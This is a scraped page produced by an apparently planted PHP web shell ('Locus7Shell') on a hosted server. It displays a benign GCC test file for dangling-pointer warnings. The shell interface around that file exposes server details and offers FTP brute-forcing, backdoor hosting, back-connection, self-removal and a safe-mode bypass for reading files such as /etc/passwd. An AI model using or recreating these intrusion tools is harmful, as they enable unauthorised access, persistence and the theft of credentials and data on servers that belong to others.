Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/g++.dg/warn/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     Wdangling-pointer.C (1.24 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* Exercise basic C++-only cases of -Wdangling-pointer.
   { dg-do compile }
   { dg-options "-Wall -Wno-class-memaccess" } */

extern "C" void* memset (void*, int, __SIZE_TYPE__);

void sink (const void*, ...);

struct S { S (); };

void nowarn_int_ref (int i)
{
  const S &sref = S ();
  const int &iref = 1 + i;
  sink (&sref, &iref);
}

void warn_init_ref_member ()
{
  struct AS
  {
    const S &sref;
    AS ():
      // The temporary S object is destroyed when AS::AS() returns.
      sref (S ())  // { dg-warning "storing the address" }
    { }
  } as;

  struct Ai
  {
    const int &iref;
    Ai ():
      // The temporary int is destroyed when Ai::Ai() returns.
      iref (1 + 1)  // { dg-warning "storing the address" }
    { }
  } ai;

  sink (&as, &ai);
}


void default_ref_arg (const S& = S ());

void nowarn_call_default_ref_arg ()
{
  default_ref_arg ();
}


void nowarn_array_access ()
{
  /* Verify that the clobber in the exceptional basic block doesn't
     cause bogus warnings.  */
  S a[1];
  memset (a, 0, sizeof a);
  sink (a);
}


void nowarn_array_access_cond (int i)
{
  if (i)
    {
      S a1[1];
      memset (a1, 0, sizeof a1);
      sink (a1);
    }
  else
    {
      S a2[2];
      memset (a2, 0, sizeof a2);
      sink (a2);
    }
}

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0057 ]--